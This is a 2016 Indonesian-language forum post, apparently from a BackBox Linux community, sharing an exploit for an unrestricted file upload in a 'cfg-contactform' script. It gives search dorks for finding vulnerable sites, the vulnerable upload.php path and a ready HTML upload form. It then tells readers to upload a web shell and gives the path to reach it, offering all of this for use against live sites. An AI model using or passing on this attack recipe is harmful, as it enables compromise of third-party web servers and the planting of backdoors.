NEW CONTENT RANDOM THREAD Unread Post

cfg-contactform Vulnerability File Upload

by Nue Bhandell - 05-27-2016 at 12:02 PM
Nue Bhandell
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 05-27-2016, 12:02 PM (This post was last modified: 05-27-2016, 12:15 PM by Nue Bhandell.)
iseng2 share exploit lawas, kali aja masih crootz.
btw sekalian nyicip Shell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.

langsung ja, Play with me Baby  :heart:

Dork:
"/cfg-contactform-1/" 
"/cfg-contactform-2/"

# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php

Vuln? {"filename":" -001."} *trgantung dork sih

[Image: 7b43e7787e784a25a581c140acc7a1dd.png]

CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>

lalu tinggal upload file/shell ente.
kalo berhasil muncul nama shell ente

[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]

Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php

[Image: 50ec314b0dc94aef8937f16135eca205.png]

untuk code PHP disini 

Semoga bermanfaat gengs, maap kalo tutor cupu  :D
jgn lupa kunjungin Blog ane juga yak wkkww : TKJ Cyber Art

~ Bye


SUMUR
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob